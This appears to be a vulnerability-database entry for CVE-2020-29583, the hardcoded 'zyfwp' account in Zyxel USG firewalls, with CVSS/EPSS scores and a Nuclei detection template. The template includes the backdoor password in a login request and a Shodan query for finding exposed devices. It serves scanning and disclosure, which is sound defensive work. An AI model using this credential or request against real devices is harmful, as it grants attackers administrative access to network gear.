ProjectDiscoveryNUCLEI:CVE-2020-29583ZyXel USG - Hardcoded Credentials
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.962 High
EPSS
Percentile
99.5%
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
id: CVE-2020-29583
info:
name: ZyXel USG - Hardcoded Credentials
author: canberbamber
severity: critical
description: |
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
remediation: |
Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
reference:
- https://www.zyxel.com/support/CVE-2020-29583.shtml
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29583
cwe-id: CWE-522
epss-score: 0.96219
epss-percentile: 0.99483
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zyxel
product: usg20-vpn_firmware
shodan-query: title:"USG FLEX 100"
tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev
http:
- raw:
- |
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
Host: {{Hostname}}
- |
GET /ext-js/index.html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- 'data-qtip="Web Console'
- 'CLI'
- 'Configuration"></a>'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950References
ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
nvd.nist.gov/vuln/detail/CVE-2020-29583
support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
www.zyxel.com/support/CVE-2020-29583.shtml
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.962 High
EPSS
Percentile
99.5%